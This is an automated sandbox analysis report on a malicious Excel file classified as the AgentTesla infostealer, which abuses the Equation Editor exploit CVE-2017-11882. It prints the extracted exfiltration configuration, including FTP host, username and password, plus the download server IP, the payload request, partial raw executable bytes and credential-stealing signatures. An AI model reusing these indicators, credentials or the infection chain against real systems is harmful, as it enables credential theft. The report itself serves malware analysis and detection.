Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2nd order.xlsx

Overview

General Information

Sample Name:2nd order.xlsx
Analysis ID:562302
MD5:2228ac7e47957e002d910cc94f89de42
SHA1:b501e0c89273dab89064714d02cdac80f2b66081
SHA256:c4cc3595a77129454c15a736113cb88234acc97074f7305754187d9fc168f58a
Tags:xlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1448 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2852 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2240 cmdline: "C:\Users\Public\vbc.exe" MD5: 345EBABC50767D04F3457FA7790A8777)
      • vbc.exe (PID: 2408 cmdline: C:\Users\Public\vbc.exe MD5: 345EBABC50767D04F3457FA7790A8777)
  • cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://primesinsured.com/", "Username": "oil1@primesinsured.com", "Password": "R0r?~C#w}a*s"}
SourceRuleDescriptionAuthorStrings
00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            5.0.vbc.exe.400000.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.0.vbc.exe.400000.5.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                5.0.vbc.exe.400000.5.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x30c4a:$s1: get_kbok
                • 0x3157e:$s2: get_CHoo
                • 0x321d9:$s3: set_passwordIsSet
                • 0x30a4e:$s4: get_enableLog
                • 0x350f3:$s8: torbrowser
                • 0x33acf:$s10: logins
                • 0x33447:$s11: credential
                • 0x2fe39:$g1: get_Clipboard
                • 0x2fe47:$g2: get_Keyboard
                • 0x2fe54:$g3: get_Password
                • 0x3142c:$g4: get_CtrlKeyDown
                • 0x3143c:$g5: get_ShiftKeyDown
                • 0x3144d:$g6: get_AltKeyDown
                5.2.vbc.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  5.2.vbc.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 29 entries

                    Exploits

                    barindex
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.127.213, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2852, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2852, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2852, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2240
                    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2852, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2240

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 5.0.vbc.exe.400000.11.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://primesinsured.com/", "Username": "oil1@primesinsured.com", "Password": "R0r?~C#w}a*s"}
                    Source: ftp://primesinsured.com/oil1Avira URL Cloud: Label: malware
                    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
                    Source: 5.0.vbc.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.vbc.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.vbc.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.vbc.exe.400000.13.unpackAvira: Label: TR/Spy.Gen8
                    Source: 5.0.vbc.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8

                    Exploits

                    barindex
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: CallConvFastca.pdbx2 source: vbc.exe.2.dr, vbc[1].exe.2.dr
                    Source: Binary string: CallConvFastca.pdb source: vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.127.213:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.12.127.213:80
                    Source: excel.exeMemory has grown: Private usage: 4MB later: 51MB
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewIP Address: 198.12.127.213 198.12.127.213
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 17:40:42 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Fri, 28 Jan 2022 13:52:18 GMTETag: "d2200-5d6a4be475dda"Accept-Ranges: bytesContent-Length: 860672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0c f5 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 14 0d 00 00 0a 00 00 00 00 00 00 9e 32 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0d 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 32 0d 00 4b 00 00 00 00 60 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d 00 0c 00 00 00 fb 31 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 12 0d 00 00 20 00 00 00 14 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 05 00 00 00 60 0d 00 00 06 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: GET /400/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.213Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.12.127.213
                    Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ftp://primesinsured.com/oil1
                    Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://FujuYs.com
                    Source: vbc.exe, 00000005.00000002.669295106.0000000002371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://SsT3DRxYDVjmHt.org
                    Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.iandreev.com
                    Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.iandreev.com/
                    Source: vbc.exe, 00000005.00000002.669330015.00000000023B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42532842.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /400/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.213Connection: Keep-Alive

                    System Summary

                    barindex
                    Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                    Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                    Source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: 5.0.vbc.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.csLarge array initialization: .cctor: array initializer size 11947
                    Source: 5.2.vbc.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.csLarge array initialization: .cctor: array initializer size 11947
                    Source: 5.0.vbc.exe.400000.5.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.csLarge array initialization: .cctor: array initializer size 11947
                    Source: 5.0.vbc.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.csLarge array initialization: .cctor: array initializer size 11947
                    Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                    Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                    Source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_008C82BC
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E08B0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0AEF
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0B00
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9C28
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9C17
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9E82
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_008C82BC
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002EF800
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002E6048
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002E5430
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002E5778
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002EE0A2
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002E2197
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_002EE490
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00784870
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00787C40
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_0078FAF0
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_007824D0
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_0078EB68
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_0078D1C8
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_0078B210
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00788208
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$2nd order.xlsxJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD815.tmpJump to behavior
